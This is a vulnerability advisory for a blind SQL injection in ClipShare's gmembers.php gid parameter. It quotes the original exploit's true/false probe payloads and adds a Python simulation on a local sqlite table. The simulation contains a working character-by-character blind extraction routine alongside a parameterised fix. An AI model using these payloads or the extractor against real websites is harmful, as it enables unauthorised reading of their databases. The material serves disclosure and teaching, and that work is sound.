ClipShare 'gid' Parameter SQL Injection Vulnerability

Release date: 2013-03-25
Updated: 2013-03-26

Affected systems:
clipshare ClipShare 4.1.4
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58681
 
ClipShare is a script for running a video-sharing community website.
 
ClipShare (gmembers.php) has a blind SQL injection vulnerability in the handling of the gid request parameter. The exploit title names version 4.1.1, the tested build is 4.1.4, and the exploit author states that all versions are affected. According to the exploit author, the flaw is only reachable once at least one group has been added to the community, and exploitation requires the MAGIC_QUOTES_GPC directive to be turned off on the server side.
 
<*Source: Esac
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site:
# Software License: Commercial.
#all versions are vulnerable:
#Note: this vulnerability works only if a group has been added to the community
#Last Checked: 24 March 2013

#to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23

=========================== BEGIN OF gmembers.php =============================================

<?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              :
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
|
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
// The only request input in this excerpt: gid comes from $_REQUEST, is gated by
// is_numeric() and passed through mysql_real_escape_string() before it is
// concatenated into the query text.
$gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs     = $conn->execute($sql);
// Exactly one matching row renders the group page; anything else redirects to
// error.php. This visible difference is the true/false oracle used by the PoC.
if ( $conn->Affected_Rows() == 1 ) {
    $urlkey     = $rs->fields['gurl'];
    $gname      = $rs->fields['gname'];
    $gupload    = $rs->fields['gupload'];
    $oid        = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................

?>

============================================================================================================


 
 Poc :

?gid=6 [Blind SQLi]

Real exploitation :

?gid=6 AND 1=1
==> returns the normal page

?gid=6 AND 1=2
==> returns a page with some errors (or with nothing: a white page)

--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac
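The PoC above only gives the two probes (AND 1=1 / AND 1=2). The script below is an added example written for this page, not ClipShare's code and not part of Esac's exploit: it simulates the vulnerable lookup with an in-memory sqlite3 table, shows the parameterised fix beside it, and turns the "group page or error page" difference into a boolean-based blind extractor that reads a column one character at a time. Two caveats are built into its assumptions. First, the payload `6 AND 1=1` carries no quote character, so the sink it targets must splice gid into the SQL text unquoted; the gmembers.php excerpt shown above gates gid with is_numeric() and wraps it in single quotes and would reject that payload as printed, while the exploit text points at members.php line 23, which is not reproduced on this page. Second, for the same reason quote escaping (magic_quotes_gpc, mysql_real_escape_string) does nothing against a purely numeric payload. The table rows are constructed sample data, and `unicode()`/`substr()` are SQLite spellings of what would be `ORD()`/`SUBSTRING()` against MySQL.

```python
"""Boolean-based blind SQL injection through a numeric 'gid' parameter.

Added simulation for this page, not ClipShare's code: an in-memory sqlite3
table stands in for group_own, one lookup concatenates gid into the query
text (the assumed vulnerable sink), one binds it as a parameter (the fix),
and the extractor drives the true/false page oracle from the PoC to read
data a character at a time.
"""
import sqlite3

# Constructed sample rows standing in for the real group_own table.
_conn = sqlite3.connect(":memory:")
_conn.execute(
    "CREATE TABLE group_own (GID INTEGER, OID INTEGER, gname TEXT, gurl TEXT, gupload TEXT)"
)
_conn.executemany(
    "INSERT INTO group_own VALUES (?, ?, ?, ?, ?)",
    [(6, 1, "Admins", "admins", "yes"), (7, 2, "Staff", "staff", "no")],
)


def vulnerable_lookup(gid: str):
    """Assumed vulnerable sink: gid is spliced into the SQL text unquoted.

    The PoC payload '6 AND 1=1' carries no quote character, so the sink it
    targets must look like this; quote escaping (magic_quotes_gpc or
    mysql_real_escape_string) does nothing against a purely numeric payload.
    """
    sql = "SELECT * FROM group_own WHERE GID=" + gid + " LIMIT 1"
    return _conn.execute(sql).fetchone()


def hardened_lookup(gid: str):
    """Fix: accept only an integer and bind it; the SQL text never changes."""
    if not gid.isdigit():
        return None
    return _conn.execute(
        "SELECT * FROM group_own WHERE GID=? LIMIT 1", (int(gid),)
    ).fetchone()


def page_shows_group(gid: str) -> bool:
    """The attacker's oracle. gmembers.php renders the group page when exactly
    one row comes back and redirects to error.php?type=group_missing otherwise,
    so 'did I get the group page?' answers one yes/no question per request."""
    return vulnerable_lookup(gid) is not None


def extract_string(oracle, scalar_select: str, gid: str = "6", max_len: int = 64) -> str:
    """Recover the result of scalar_select (one column of one row) character by
    character, binary-searching each code point over 0..127 with probes of the
    form 'is character i greater than N?'. Seven requests per character.

    unicode()/substr() are SQLite's spellings; against MySQL the same probe
    would use ORD()/SUBSTRING().
    """
    recovered = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"(SELECT unicode(substr(({scalar_select}), {pos}, 1))) > {mid}"
            if oracle(f"{gid} AND {probe}"):
                lo = mid + 1      # character is above mid
            else:
                hi = mid          # character is mid or below (or past the end: NULL)
        if lo == 0:               # past the end of the string: substr() gave ''
            break
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    print(vulnerable_lookup("6 AND 1=1") is not None)   # group page
    print(vulnerable_lookup("6 AND 1=2") is not None)   # error page
    print(hardened_lookup("6 AND 1=1"))                  # rejected outright
    print(extract_string(page_shows_group, "SELECT gname FROM group_own WHERE GID=6"))
```

The extractor never needs an error message or a UNION: the redirect to error.php versus the rendered group page is the whole channel, which is why the PoC's "normal page" / "white page" pair is sufficient to read the database. A fix that only escapes quotes leaves this channel open; the hardened lookup closes it by refusing anything but an integer and binding the value as a parameter.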

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
clipshare
---------
The vendor has released an upgrade patch that fixes this issue; please download it from the vendor's homepage:
 
